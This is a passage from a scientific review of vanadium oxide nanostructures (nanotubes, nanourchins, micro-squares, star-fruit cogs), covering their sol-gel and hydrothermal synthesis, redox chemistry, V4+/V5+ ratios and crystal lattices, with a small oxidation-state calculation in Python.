The scheme exhibits a graphical correlation between the vanadium ion oxidation state and the preferential coordination polyhedron it adopts. For example, the V 5+ cation is not only located in the tetrahedron polyhedron but can also incorporate the trigonal bipyramid, square pyramid, and distorted octahedra; on the other hand, the V 4+ cation appears in the trigonal bipyramid, square pyramid, and distorted octahedra, while the V 3+ cation is found solely in the rectilinear octahedra polyhedron. The vanadyl bond (V = O) [40] appears in most of the polyhedrons; the only exception is the rectilinear octahedra. Vanadium oxide structural networks are considered to be composed of bonded polyhedrons [41], where chains are created and connected with each other, forming 2D (bidimensional) layers (habitually named sheets) that originate different 3D (tridimensional) networks following the path: polyhedron → chain → layer → tridimensional network; the middle links in the sequence are established as building blocks [42]; therefore, any vanadium oxide network can be defined and classified by the polyhedrons that it is made from.
This is the reason that V 2 O 5 is described as a shape-shifter: once it faces reduction, the V 5+ ion coordination changes and a new structural network is obtained. As a result, this modular material system can be used to synthesize, characterize, and tailor-make numerous nano- and microstructures with novel morphologies [43][44][45][46]. The aqueous chemistry that the V 5+ precursors undergo, together with chemical parameters such as pH, organic polar solvents, concentration, and other species (anions from the V 5+ precursor), affects the fashion in which the polyhedrons are bonded, influencing the building blocks to create different vanadium oxide networks [47].
Livage [48] reviewed the condensation reactions that arise at higher concentrations from the aqueous V 5+ octahedral precursor. Two types of reactions co-exist, olation and oxolation; both are pH dependent, involve hydroxyl groups and water molecules under nucleophilic addition processes, and only take place along the xy planes. Schematically (standard olation/oxolation chemistry):

Olation: V-OH + V-OH 2 → V-OH-V + H 2 O
Oxolation: V-OH + HO-V → V-O-V + H 2 O

Unfortunately, these reactions do not consider physical parameters, such as temperature and pressure, or chemical parameters such as intercalated guest species, including long alkyl chain surfactants displaying primary monoamine, thiol, and carboxylic acid (C n H (2n+1) NH 2 , C n H (2n+1) SH, and C (n−1) H (2n+1) COOH) organic functional groups [49,50], solvent mixtures with different polarity degrees, and host-guest stoichiometry [51]. The redox reactions will therefore play a major role under hydrothermal treatment [52], where new structural lattices will be formed, depending on the reduction ratio obtained, which will vary in every synthesis [53].
There is a flexible, layered structural host lattice obtained under hydrothermal treatment from different V 5+ precursors, which displays a V 4+ /V 5+ mixed oxidation state with different ratios, made of tetrahedral and distorted octahedral/square pyramid mixed-valence sites. This is the main framework of many nano- and microstructures (for example, vanadium oxide nanotubes (VOx-NTs), urchins (VOx-NU), bricks and squares (VOx-MSQ), etc.). This lattice is known as the vanadium bronze BaV 7 O 16 •nH 2 O; in-between the layers, the Ba 2+ cations and water molecules are intercalated; the structure is made of zig-zag chain trimers consisting of distorted octahedral-coordinated V(1)O 6 -V(2)O 6 -V(1)O 6 shared-edge atoms; the layer is created when the chain links with other neighboring zig-zag chains by sharing one oxygen atom between the V(1)O 6 -V(1)O 6 octahedral sites. These layers link by sharing common edges, where the octahedral coordination is achieved between the V(1) site from the upper layer bonding with one oxygen from the V(2) site from the lower layer, with all the vanadyl bonds pointing up in the top layer and down in the lower one. Both distorted octahedral layers are connected with a V(3)O 4 site exhibiting tetrahedral coordination between the V(1)O 6 -V(2)O 6 sites in each layer. While the V 4+ and V 5+ cations occupy the V(1)O 6 and V(2)O 6 sites, the V 5+ has a V(1)O 6 site preference, due to a lower symmetry; the lattice has a tetragonal unit cell with lattice parameters a = 6.1598 Å and c = 21.522 Å. The structure has been used to simulate the VOx-NT framework in tetragonal and triclinic modifications [55].
Hellmann et al. [56] proposed another [V 7 O 16 ] structural lattice for tubular morphologies, where the octahedral coordination trimers made of V(1)O 5 -V(2)O 5 -V(1)O 5 atoms from the zig-zag chains in the double layers are heavily elongated, adopting predominantly a square pyramidal VO 5 coordination. The lattice has a quasi-tetragonal unit cell with lattice parameter a ≈ 6.0 Å, and the length of the c axis is determined by the self-assembled, intercalated, long alkyl chain primary amine or diamine between the layers of the stacked V 7 O 16 framework. There are many structural models based on this structural lattice related to the VOx-NT walls [57].
This review focuses on qualitatively analyzing the possible redox reactions, from the early-stage intercalation sol-gel processes through the hydrothermal treatment, that could take place in the different vanadium oxide nano- and microstructures, such as vanadium oxide nanotubes (VOx-NTs), nanourchins (VOx-NU), micro-squares and crosses (VOx-MSQ and VO 2 -MC), and nano six-folds (cogs) and nano star-fruits (VOx-NC and VO 2 -NSF). These exhibit different degrees of reduction, ranging from mixed oxidation state V 4+ /V 5+ ratios, through complete V 5+ reduction to V 4+ , to mixed oxidation V 3+ /V 4+ ratios, which are associated with different mixed-valence structural lattices, in which V 7 O 16 2− , VO 2 , and V 6 O 11 are obtained, as well as with the specific morphology, shape, size distribution, surface defects, etc. Some approaches to regulate the mixed oxidation V 4+ /V 5+ ratio under soft chemical processes are also covered.
Materials and Methods
The V 5+ precursors used are V 2 O 5 , VOCl 3 , VO(OCH(CH 3 ) 2 ) 3 , NH 4 VO 3 , and the xerogel V 2 O 5 •1.5H 2 O. The most common surfactants employed are mainly long alkyl chain primary monoamines, long alkyl chain thiols, and Pluronic copolymer. Table 1 lists some of the synthetic procedures, including the V 5+ precursors, the surfactants, and the corresponding structural lattice obtained after hydrothermal treatment. Figure 2 exhibits a scheme sequencing the steps taken to synthesize vanadium oxide nanourchins, which can be applied to nanotubes, squares, and six-fold cogs.
Figure 2. Synthetic procedure to obtain vanadium oxide nanourchins (VOx-NU), using the VO(OCH(CH 3 ) 2 ) 3 V 5+ precursor and 1-octadecylamine in a sol-gel process enhanced with hydrothermal treatment, where V 5+ reduces 46.0% into V 4+ , morphing from the V 2 O 5 to the V 7 O 16 2− structural lattice.

Table 2 exhibits the V 4+ percentage obtained when the hydrothermal treatment is performed in each synthesis; the reduction is approximately 50.0% to V 4+ in VOx-NTs and VOx-NU, 75.0% for squares and bricks (VOx-MSQ), a complete reduction from V 5+ to V 4+ for VOx-MC and VOx-NSF, and sometimes even further to V 3+ in VOx-NC. Vanadium oxide nanotubes (often exhibiting micrometric lengths, containing nanometric inner and outer diameters) are synthesized using different vanadium (V) precursors and techniques. For example, V 2 O 5 , NH 4 VO 3 , VOCl 3 , vanadium (V) oxytriisopropoxide, and V 2 O 5 •H 2 O xerogel are directed, with long chain alkyl amines as surfactants, under a sol-gel technique. The first one works straightforwardly as a host lattice to allow guest species to be intercalated, and the others are treated under acid hydrolysis and condensation reactions in order to form the V 2 O 5 host lattice in the presence of long-chain alkyl amines. Some of these precursors will be analyzed below in other microstructures; for example, the VOCl 3 precursor reacts with water and is directed with long alkyl chain amines; the mixture is buffered with CH 3 COONa/CH 3 COOH solution to maintain the pH below 7.0 to produce the layered organic-inorganic nanocomposite; the reduction process is insignificant; and the protonated RNH 3 + monoamines are intercalated in-between the vanadium oxide layers. The hydrolysis and condensation sol-gel reactions can be written schematically as:

Hydrolysis: VOCl 3 + 3 H 2 O → VO(OH) 3 + 3 HCl
Condensation: 2 VO(OH) 3 → V 2 O 5 + 3 H 2 O
Results
The intermolecular forces display a major role in the intercalation processes; the amines are protonated if the pH of the medium is lower than 7.0 at room temperature. The ion-dipole and dipole-dipole interactions with the vanadyl bond from the host lattice, and the cooperative hydrogen bond interactions between RN-H···O=V, are crucial; on the other hand, the London forces between the hydrophobic hydrocarbon chains allow the establishment of a self-assembled layered RNH 3 + -V 2 O 5 composite, preventing the reduction process from progressing significantly, even though some slight V 5+ reduction to V 4+ proceeds. The inorganic V 2 O 5 lattice acts like an oxidant agent, accepting electrons and decreasing the vanadium atom oxidation state, while the long alkyl chain primary amine responds as the reducing agent, losing electrons and increasing the number of oxygen atoms in the functional primary amine by replacing a hydrogen atom with a hydroxyl. This can be summarized in a redox reaction, assuming the structural lattice is V 2 O 5 and 1-octadecylamine is the surfactant.
Hydrothermal treatment at 180 °C for seven days yields VOx-NTs; the reduction process exhibits a V 4+ /V 5+ ratio of approximately 0.85 (46.0% V 4+ and 54.0% V 5+ ); the weighted oxidation state corresponds to 4.54+ (V 4.54+ ). Therefore, a mixed oxidation-state vanadium oxide lattice is formed; in these nanotubes, the self-assembled long alkyl chain primary amines are still embedded (intercalated) inside the vanadium oxide layers; therefore, the intermolecular forces previously mentioned are once again responsible for preventing a complete reduction from V 5+ to V 4+ . The flexible host lattice rolls up, acquiring the nanotube morphology ((C n H (2n+1) NH 3 ) 2 V 7 O 16 with 3 < n < 21). The transmission electron micrographs in Figure 3 illustrate the morphology; the tubular walls of the VOx-NTs are composed of a (C n H (2n+1) NH 3 ) 2 V 7 O 16 layered framework made of zig-zag chains, consisting of square pyramids that share their edges, whereas the V(2)O 5 site is surrounded by two V(1)O 5 sites, generating a trimer which is connected with another chain by sharing an oxygen atom, creating a layer where all the vanadyl bonds point up in the pyramid apex direction. This layer is connected with another one featuring the same structure, pointing in the opposite direction, by sharing a tetrahedral V(3)O 4 site in-between them, conferring on the framework some robustness and flexibility; the triclinic unit cell parameters are a = 6.16 Å, b = 6.17 Å, and c = 19.1 Å, with α = 96.14°, β = 92.82°, and γ = 90.07° [68]. The V 4+ = O vanadyl bond has been reported as being localized in the tetrahedral V(3)O 4 sites [69]. The buffer CH 3 COONa/CH 3 COOH and chloride anions must be removed before the hydrothermal treatment; otherwise, they will interact with the embedded amines during the reaction at 180 °C, causing the self-assembled amines to be displaced from the host lattice, which facilitates a further reduction that could result in V 4+ .
Vanadium Oxide ((C n H (2n+1) NH 3 ) 2 V 7 O 16 ) Nanourchins (VOx-NU)
Vanadium oxide nanourchins (VOx-NU) are synthesized using the same alkoxide synthetic route as VOx-NTs. O'Dwyer and Roppolo et al. used the V 5+ precursor VO(OCH(CH 3 ) 2 ) 3 [70,71]. Even though the same 2:1 stoichiometry is used (alkoxide:long alkyl chain primary monoamine), the quantity and solvent ratios employed in the synthesis are different; therefore, the surfactants' arrangement in this solvent:medium ratio might explain the morphology of the high-density nanotube radial array spherical clusters; the sol-gel process is directed by long alkyl chain primary monoamines, for example, 1-hexadecylamine, 1-dodecylamine, and 1-octadecylamine. The synthesis is performed under inert atmospheric conditions (argon environment) in an ethanol/water solvent mixture. A layered inorganic-organic intercalation compound is obtained, where the long alkyl chain primary amines are intercalated in a self-assembled configuration in-between the layers of a V 2 O 5 host lattice; the process is governed by the same intermolecular interactions explained previously for VOx-NTs. The sol-gel hydrolysis and condensation reactions can be written schematically as:

Hydrolysis: VO(OCH(CH 3 ) 2 ) 3 + 3 H 2 O → VO(OH) 3 + 3 (CH 3 ) 2 CHOH
Condensation: 2 VO(OH) 3 → V 2 O 5 + 3 H 2 O
The inorganic-organic layered intercalation compound features a minor reduction process at room temperature from V 5+ to V 4+ , where the V 2 O 5 host displays an oxidant agent role and the long alkyl chain primary monoamines a reducing agent role; the intermolecular interactions prevent a major degree of reduction taking place. The hydrothermal treatment at 180 °C over seven days creates the nanourchin spherical clusters. In this process, many different reactions take place; the V 5+ to V 4+ reduction is significant and ranges from 46 to 50% (the weighted oxidation state is V 4.54+ to V 4.5+ ); the temperature and pressure might be key factors transitioning the structural lattice from V 2 O 5 to V 7 O 16 2− ; and the inorganic-organic layered intercalation compound retains the self-assembled long alkyl chain primary amines inside the V 7 O 16 2− layers ((C n H (2n+1) NH 3 ) 2 V 7 O 16 with 11 < n < 19). Therefore, the intermolecular interactions control the V 4+ /V 5+ ratio between 0.85 and 1.0. The morphology displays a tubular configuration, which is also self-assembled into spherical clusters. The structural lattice is the same framework studied previously for the vanadium oxide nanotubes; the reduction proceeds with the long alkyl chain primary monoamines (for example, 1-hexadecylamine (HDA)) acting as reducing agents.
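Because the discussion repeatedly converts between the V 4+ /V 5+ molar ratio, the V 4+ percentage, and the weighted (average) oxidation state, a small sketch of that bookkeeping may help; this is plain two-state arithmetic under the assumption that only V 4+ and V 5+ are present:

```python
# Convert a V4+/V5+ molar ratio into the V4+ fraction and the weighted
# (average) vanadium oxidation state, assuming only V4+ and V5+ are present.

def weighted_oxidation_state(ratio_v4_v5):
    """Return (V4+ fraction, average oxidation state) for a V4+/V5+ ratio."""
    f_v4 = ratio_v4_v5 / (1.0 + ratio_v4_v5)
    return f_v4, 5.0 - f_v4  # 4*f + 5*(1 - f) simplifies to 5 - f

for ratio in (0.85, 1.0, 2.448, 2.745):
    f_v4, state = weighted_oxidation_state(ratio)
    print(f"V4+/V5+ = {ratio}: {100 * f_v4:.1f}% V4+, V{state:.3f}+")
# A ratio of 0.85 gives ~45.9% V4+ and V4.54+, matching the VOx-NT/VOx-NU
# values quoted in the text.
```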
Perera et al. [63] synthesized VOx-NU using 10 mmol of the V 2 O 5 precursor with 10 mmol 1-hexadecylamine under strong agitation in 40 mL of deionized water for 48 h; the yellow suspension was placed in a Teflon-lined autoclave under hydrothermal treatment for seven days, and spherical clusters with high-density nanotubes were obtained, in which the amines are intercalated in-between the V 7 O 16 2− layers, interacting under van der Waals forces. The set of SEM micrographs in Figure 4 exhibits the spherical clusters (nanourchins) obtained after hydrothermal treatment, which feature the high-density nanotube radial arrays; for more detailed scanning electron micrographs, see supplementary information Figure S1.
Vanadium Oxide (NH 4 ) 2 V 7 O 16 Micro-Squares (VOx-MSQ) and VO 2 Micro-Crosses (VOx-MC)
Vanadium oxide micro-squares VOx-MSQ ((NH 4 ) 2 V 7 O 16 ) were obtained by Navas et al. [64], featuring the V 7 O 16 2− structural lattice of BaV 7 O 16 •nH 2 O (a tetragonal unit cell with lattice parameters a ≈ 6.17 Å and c = 21.522 Å) made of double, upper and lower layers of zig-zag chains, which are interconnected with other zig-zag chains by sharing one oxygen atom. Each chain consists of distorted octahedral VO 6 trimers (occurring when the V(1) site from the upper layer coordinates with an oxygen atom of the V(2) site from the lower layer, if both layers are close enough). These are linked with a V(3)O 4 site with tetrahedral coordination located in-between the layers, which generates the final stacked layered framework, where the ammonium polycation is intercalated. The rolling process is suppressed throughout the hydrothermal treatment; therefore, no tubular morphology arises. Nevertheless, a square morphology is obtained; the synthesis employs ammonium metavanadate (NH 4 VO 3 ) as the V 5+ precursor and 1-hexadecylamine as the amphipathic organic template; the stoichiometry (NH 4 VO 3 :1-hexadecylamine) used is 2:1; the pH is adjusted using CH 3 COOH (acetic acid) in a CH 3 CH 2 OH/H 2 O solvent mixture to facilitate the sol-gel process, even though the aqueous vanadate reactions are extensive and intricate. The V 5+ (NH 4 VO 3 ) precursor reacts with acetic acid and water; an orange suspension of the decavanadate polyanion (V 10 O 28 6− ) is obtained, consisting of ten edge-sharing VO 6 octahedra, which act as building-block clusters at pH < 2.0, precipitating as a layered organic-inorganic intercalation compound made of a V 2 O 5 host lattice containing intercalated, self-assembled long alkyl chain primary monoamine guests. Both steps can be written in abbreviated form (our balancing of the processes described here):

10 VO 3 − + 4 H + → V 10 O 28 6− + 2 H 2 O
V 10 O 28 6− + 6 H + → 5 V 2 O 5 + 3 H 2 O

The formation of the structural lattice could thus be conducted under two reactions, hydrolysis and condensation, because as the pH decreases, the coordination increases.
Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of the acetate polyanion, this might accelerate the process. The same process might also take place simultaneously, involving the ethanolic precursors. At room temperature, the sol-gel process does not generate a major degree of reduction from V 5+ to V 4+ , and intermolecular forces prevent the reduction from taking place, as reviewed for the previous V 7 O 16 structures. The layered inorganic-organic intercalation compound remains stable; the long alkyl chain amine protonation (to the C 16 H 33 NH 3 + conjugated acid) with acetic acid at a lower pH generates an exchange reaction. The NH 4 + polycations are replaced with C 16 H 33 NH 3 + inside the host lattice by reacting with acetate (the CH 3 COO − conjugated base), forming neutral CH 3 COONH 4 . The acid-base set of reactions can be written as:

C 16 H 33 NH 2 + CH 3 COOH → C 16 H 33 NH 3 + + CH 3 COO −
NH 4 + + CH 3 COO − → CH 3 COONH 4
After the hydrothermal treatment is performed at 180 °C, the reduction yields a V 4+ content of 73.0% in VOx-MSQ. There are many factors involved: the disintercalation of the self-assembled long alkyl chain primary monoamines; the concentrated acetic acid playing a fundamental role as a reductant agent, and also reacting with the long alkyl chain primary monoamines, creating long alkyl chain secondary monoamides; and the structural lattice V 7 O 16 2− hosting the remaining NH 4 + polycations to neutralize the negative charge under intercalation; therefore, the rolling effect is hindered, and the tubular morphology is missing. Instead, the flat squared morphology made of a stacked, pillared, intercalated (NH 4 ) 2 V 7 O 16 layered composite is obtained. Even though some intermolecular forces are still present, the London forces between the long alkyl carbon chains of the primary monoamines are absent; the interlayer distance is shortened, blocking the rolling process and allowing the reduction to increase. The cooperative hydrogen bonds and ion-dipole interactions between the ammonium polycations and the vanadyl bonds from the V 7 O 16 2− lattice prevent the entire reduction to VO 2 ; the V 4+ /V 5+ ratio is 2.745 (73.3% V 4+ and 26.7% V 5+ ). The quantification was performed using a calibrated permanganometric titration; the weighted oxidation state was 4.267+ (V 4.267+ ), similar to the BaV 7 O 16 •nH 2 O structure, for which a 4.29+ (V 4.29+ ) weighted oxidation state was reported (71.0% V 4+ and 29.0% V 5+ , with a V 4+ /V 5+ ratio of 2.45). The SEM and TEM micrographs from the (NH 4 ) 2 V 7 O 16 are exhibited in Figures 5 and 6, which feature the micrometric square morphology.
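As a consistency check (our arithmetic, not taken from the cited works), the (NH 4 ) 2 V 7 O 16 stoichiometry fixes the ideal average vanadium charge by charge balance:

2(+1) + 7·q̄(V) + 16(−2) = 0 → q̄(V) = 30/7 ≈ +4.29

Writing x for the number of V 4+ centers per formula unit, 4x + 5(7 − x) = 30 gives x = 5, i.e., an ideal V 4+ fraction of 5/7 ≈ 71.4% and an ideal V 4+ /V 5+ ratio of 5/2 = 2.5, in line with the measured 71.0-73.3% contents and 2.45-2.745 ratios quoted above.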
Wang et al. [65] reported the same synthesis previously described, modifying the amount of water used and increasing the aging time up to five days. The hydrothermal treatment was performed at 180 °C over five consecutive days; the VOx-MSQ ((NH 4 ) 2 V 7 O 16 •3H 2 O) displays the same square morphology; the V 4+ /V 5+ ratio is 2.448, which responds to a weighted oxidation state of 4.29+ (V 4.29+ ) distributed between 71.0% V 4+ and 29.0% V 5+ . The structure differs from its predecessor in the lattice parameters, where the unit cell is triclinic (a = 6.1008 Å, b = 12.1826 Å, and c = 17.8954 Å, with α = 88.8205°, β = 84.0988°, and γ = 89.8291°) and is made of double upper and lower layers of zig-zag chains that are interconnected by sharing one oxygen atom with the V(1)O 5 sites. Each chain consists of square pyramid VO 5 trimers displaying V(1)O 5 -V(2)O 5 -V(1)O 5 edge-sharing modes (the elongated octahedral coordination is excessively far between the V(1)O 5 sites from the upper and the V(2)O 5 sites from the lower layers); the layers are linked via the V(3)O 4 site, with tetrahedral coordination in-between the layers, which generates the final, stacked layered framework where the ammonium polycation is intercalated.

Vanadium oxide micro-crosses (VOx-MC) are obtained when hydrothermal treatment is performed for longer periods of time (over 10 days); the reducing agent, acetic acid, reduces the V 7 O 16 2− oxidant agent entirely into the VO 2 structural lattice; the vanadium atom oxidation state is 4+ (V 4+ ); the disintercalation of the NH 4 + polycations is achieved, creating ammonium acetate. Therefore, without any intermolecular forces, a complete reduction from V 5+ to V 4+ is achieved; the square-to-cross morphology transformation suggests the (NH 4 ) 2 V 7 O 16 micro-squares have split into four symmetrical VO 2 folds.
The set of SEM micrographs in Figure 7 displays the VO 2 micro-cross (VOx-MC) morphology once the intercalation compound has been dismantled. The supporting information exhibits more detailed SEM and TEM micrographs of VOx-MC in Figures S2 and S3.
A related micro-square phase, (EnH 2 ) 2 V 7 O 16 , is obtained when ethylenediamine is used instead of the ammonium polycation; its framework likewise features a tetrahedrally coordinated V(3)O 4 site placed between the upper and lower layers, and the protonated H 3 N + CH 2 CH 2 NH 3 + diamines are intercalated in the layered stacked framework. The synthesis suggests a layered intercalation compound, H 3 N + CH 2 CH 2 NH 3 + -V 2 O 5 , is formed during the sol-gel process; the intermolecular forces previously discussed are key factors in obtaining both the layered intercalation compound and the squared microstructure. The protonation of ethylenediamine with acetic acid can be written as:

H 2 NCH 2 CH 2 NH 2 + 2 CH 3 COOH → H 3 N + CH 2 CH 2 NH 3 + + 2 CH 3 COO −
The final reduction and formation of (EnH 2 ) 2 V 7 O 16 is achieved by performing a hydrothermal treatment; the acetic acid concentration and the protonated ethylenediamine display the same roles previously observed for (NH 4 ) 2 V 7 O 16 ; therefore, the acetic acid acts as the reducing agent to generate the mixed oxidation state, and the intercalated, protonated short-chain alkyl diamines prevent the complete reduction of the V 2 O 5 oxidant agent. As the rolling effect is hindered, no tubular morphology is observed; the short length of the diamine is not enough to allow nanotube formation. The 73.3% V 4+ and 26.7% V 5+ obtained give a V 4+ /V 5+ ratio of 2.745, which is associated with a weighted oxidation state of 4.267+ (V 4.267+ ). (En) 2 V 7 O 16 was previously reported by Worle et al. [72], unfortunately not in a pure phase. It was synthesized using the V 5+ VO(OCH(CH 3 ) 2 ) 3 precursor with ethylenediamine (H 2 NCH 2 CH 2 NH 2 ), using a 2:1 molar ratio in ethanol, and hydrolyzed with water. After aging for a day, a hydrothermal treatment was executed for seven days at 180 °C; the synthesis suggests the same V 4+ content should be obtained in comparison with the aforementioned (EnH 2 ) 2 V 7 O 16 . The structure has the same triclinic unit cell with lattice parameters a = 6.16 Å, b = 6.17 Å, and c = 19.1 Å, with α = 96.14°, β = 92.82°, and γ = 90.07°, and presents the structural features previously mentioned.
The micro-square morphology with the same lattice, (NH 4 ) 2 V 7 O 16 , has been synthesized with different reducing agents. For example, Ma et al. [73,74] used the same V 5+ precursor (NH 4 VO 3 ) without long or short alkyl chain primary monoamines/diamines, using formic acid (HCOOH) as the reducing agent in water instead. The mixture was hydrothermally treated at 250 °C for 12 h; the reaction created micrometric square bricks. The first stage of the synthesis is very similar to the VOx-MSQ previously reviewed; the structural lattice was unknown at the time and was first described as a novel (NH 4 ) 2 V 2 O 5 . In the synthesis, NH 4 VO 3 generates vanadates under various hydrolysis and condensation reactions, summarized in abbreviated form below, covering the possible processes that could be involved throughout the synthesis.
Decavanadate generates V 2 O 5 under precipitation at low pH, which undergoes reduction at high temperature through the hydrothermal treatment, yielding the structural (NH 4 ) 2 V 7 O 16 lattice with the micro-brick morphology, with formic acid acting as the reducing agent and the NH 4 + polycations in aqueous media being intercalated; some other side reactions could also have taken place. The V 4+ /V 5+ ratio is approximately 0.667, yielding a 40.0% V 4+ content and a 60.0% V 5+ content. The weighted oxidation state is 4.60+ (V 4.60+ ), the smallest reduction degree in (NH 4 ) 2 V 7 O 16 found in the literature. The structural lattice was resolved in their second work and resembles the same triclinic unit cell, framework, and lattice parameters previously described by Roppolo et al. [71] for the (EnH 2 ) 2 V 7 O 16 microstructures.
Heo et al. [75] reported the same micro-square (NH 4 ) 2 V 7 O 16 morphology via a hydrothermal treatment at 250 °C for 15 h, using NH 4 VO 3 (the V 5+ precursor) and the LiBH 4 reducing agent in a tetrahydrofuran/water medium. Ammonium metavanadate in water exists as infinite tetrahedra chains; adjusting the pH will produce the VO 4 3− polyanion, which, in turn, is the main polyhedron in the equilibrium. Some previous studies have demonstrated that LiBH 4 reduces VO 4 3− polyoxoanions into VO 2 ; therefore, a redox reaction could be associated with this transformation, considering the borohydride hydrolysis (schematically, LiBH 4 + 2 H 2 O → LiBO 2 + 4 H 2 ). The (NH 4 ) 2 V 7 O 16 structural lattice could have been formed through many factors under the hydrothermal treatment; for example, with incomplete stoichiometry (adding minor quantities of LiBH 4 ), VO 4 3− will be only partially reduced. Therefore, the formation of (NH 4 ) 2 V 7 O 16 could be the main consequence, allowing the NH 4 + intercalation inside the oxide layers. The V 4+ /V 5+ ratio is approximately 2.45, yielding a 71.0% V 4+ content and a 29.0% V 5+ content; the weighted oxidation state is 4.29+ (V 4.29+ ), similar to the BaV 7 O 16 •nH 2 O found in the literature. The structure features a triclinic unit cell with lattice parameters a = 6.1480 Å, b = 6.1434 Å, and c = 18.0309 Å, with α = 95.621°, β = 93.018°, and γ = 89.971°. It displays the same framework and structural features previously mentioned by Wang et al. [65].
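To make the incomplete-stoichiometry argument above concrete, a rough electron-bookkeeping sketch follows (our simplifying assumptions, not from the cited work: each BH 4 − delivers up to eight electrons on full oxidation of its hydrides, each V 5+ → V 4+ step consumes one electron, and competing reactions such as the hydrolysis above are ignored):

```python
# Rough electron bookkeeping for the partial reduction NH4VO3 -> (NH4)2V7O16.
# Assumptions (not from the cited work): each BH4- donates up to 8 electrons
# when fully oxidized (4 hydrides, H(-I) -> H(+I)), and each V5+ -> V4+ step
# consumes exactly 1 electron; kinetics and side reactions are ignored.

V4_FRACTION = 5 / 7       # ideal V4+ fraction in (NH4)2V7O16 (charge balance)
ELECTRONS_PER_BH4 = 8     # electrons available per borohydride anion

libh4_per_vanadium = V4_FRACTION / ELECTRONS_PER_BH4
print(f"~{libh4_per_vanadium:.3f} mol LiBH4 per mol NH4VO3")  # ~0.089 mol
```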
The previous method was optimized by Ma et al. [76] using the same V 5+ precursor (NH 4 VO 3 ) dispersed in water and reduced with LiBH 4 in tetrahydrofuran for 10 min. The black powder was transferred into a Teflon-lined autoclave and was hydrothermally treated for 10 h at 180 °C under low-speed rotation at 15 rpm; the (NH 4 ) 2 V 7 O 16 microstructures display a hierarchical structure made of self-assembled nanoflakes resembling spheres. The V 4+ /V 5+ ratio is not reported, suggesting it has the same ratio reported in the previous method; the structural lattice framework and lattice parameters are equally related to the (NH 4 ) 2 V 7 O 16 ammonium vanadium bronze reported by Heo et al. [75].
Vanadium Oxide V 6 O 11 Rotationally Symmetric Nano Six-Folds (VOx-NC) and Nano Star Fruits (VOx-NSF)
Vanadium oxide rotationally symmetric nano six-folds, featuring a star fruit or cog morphology (VOx-NC), were reported by O'Dwyer et al. [66]. The sol-gel synthesis employs vanadium oxide xerogel and long alkyl chain thiols; preparing the layered vanadium oxide xerogel involves a reaction with a V 2 O 5 precursor, refluxed in tert-butanol for approximately eight hours at 100 °C; vanadium (V) tri-tert-butoxide is created (schematically, V 2 O 5 + 6 (CH 3 ) 3 COH → 2 VO(OC(CH 3 ) 3 ) 3 + 3 H 2 O). The VO(OC(CH 3 ) 3 ) 3 precursor then reacts with water, generating the layered xerogel vanadium oxide (V 2 O 5 •nH 2 O) compound, which becomes stable after rearrangement during an aging process of seven days. The xerogel structure is based on a sol-gel process, which can be written schematically as:

Hydrolysis: VO(OC(CH 3 ) 3 ) 3 + 3 H 2 O → VO(OH) 3 + 3 (CH 3 ) 3 COH
Condensation: 2 VO(OH) 3 → V 2 O 5 •nH 2 O + (3 − n) H 2 O
It has been reported that the xerogel encounters a small reduction process with water during the aging process; a simple reaction can exemplify this change. There are some differences in the intercalation of the long alkyl chain thiols inside the vanadium oxide xerogel layers when the reaction is performed at 40 °C instead. The organic functional group thiol, CH 3 -(CH 2 ) 11 -SH (1-dodecanethiol (DDT)), is not able to interact with the host lattice under the hydrogen bonds, and the vanadium oxide content in the xerogel is very low in comparison with other vanadium (V) oxide precursors; these factors might accelerate the reduction process during the early stage of the synthesis. The temperature accelerates the reduction process, under vigorous stirring, and is associated with the self-assembled intercalated thiols. The interactions with the vanadyl bonds from the host lattice are not strong enough, being partially driven by the dipole-dipole interactions and London forces, which still allow the intercalation compound formation but fail to control the reduction path; therefore, the degree of reduction is stronger; the reducing agent (the thiols) might oxidize into disulfides through the reaction, and the oxidant agent V 2 O 5 reduces halfway into V 4+ . The hydrothermal treatment over seven days at 180 °C increases the reduction process to an extensive degree; the structure changes from V 2 O 5 /V 2 O 4 into a crystalline V 6 O 11 lattice; the intermolecular forces are overcome; the thiols' oxidation into disulfides allows the complete disintercalation process; and the structure reduces its oxidation states into a V 3+ /V 4+ mixture, generating the star shape morphology (one possible overall scheme, considering that at 180 °C all intercalated water had been removed from the xerogel, is 3 V 2 O 4 + 2 RSH → V 6 O 11 + RSSR + H 2 O). The SEM and TEM micrographs showing the star morphology and the evidence of disintercalation (also confirmed by XRD analysis) are displayed in Figures 8 and 9. More detailed scanning micrographs can be seen in the supporting information Figure S4. The method to produce a similar structure with another structural lattice was reported by Shao et al.
[67] The synthesis employed the vanadium oxide precursor NH 4 VO 3 in the presence of Pluronic 123; the pH was controlled with formic acid (HCOOH); the mixture was hydrothermally treated for 48 h at 180 °C; the hexangular star-fruit vanadium oxide obtained exhibits a VO 2 structural lattice, confirming a full reduction from V 5+ to V 4+ . The first stage of the synthesis implies the transition from metavanadate into vanadium pentoxide at a lower pH under a sol-gel process; no evidence of an intercalation process is reported; therefore, at room temperature, the reduction process is minimal. The abbreviated reaction is shown below.
First stage: Sol-gel
The second stage corresponds to the hydrothermal treatment, aided by two reducing agents, formic acid and Pluronic 123, and without the formation of an intercalation compound in the previous stage. Therefore, the reduction of the oxidant agent is faster at the same temperature used for the vanadium oxide VOx-MSQ previously described. The ammonium cation (NH 4 + ) was not reported to be intercalated inside the vanadium dioxide of the final star-fruit structure, which suggests that the ammonium remains as the HCOONH 4 salt during the hydrothermal treatment; the reaction can be seen below.
Hydrothermal treatment
During the reduction, some nanosheets and nanofibers are formed; therefore, the second role of the Pluronic 123 is to assist the self-assembly of these nanostructures to build the final hexangular star-fruit structure.
Mixed Oxidation State Ratio Control
Researchers have tried to change or vary the V 5+ /V 4+ ratio in order to modify the electronic properties [77], without altering the structure morphology, and many applications and new properties have been obtained and enhanced. The most common techniques are functionalization processes on intercalated organic-inorganic hybrids, such as nanotubes or nanourchins. Some organic self-assembled amphiphilic molecules, and foreign species such as cations, anions, and other surfactants, are reversibly inserted into the vanadium oxide sheets, regulating the oxidation state ratio. Other techniques are doping processes, such as adding or removing electrons using reducing or oxidant agents, shifting the oxidation state ratio; the synthesis can be modified at the beginning by adding small quantities of different metal cations to become part of the structure; the structure's morphology stays invariable but its electronic properties are adjusted. Atomic layer deposition (ALD) is used to achieve desirable electronic properties as well: different atoms, cations, or anions are infiltrated at specific locations over the vanadium oxide microstructure without altering the structure's morphology. For example, V. Lavayen et al. [78] inserted gold nanoparticles (Au-NPs), stabilized with long alkyl thiols (1-dodecanethiol (DDT)), into vanadium oxide nanotubes (VOx-NTs) intercalated with 1-dodecylamine (DDA). A DDT:DDA ratio of 4:1 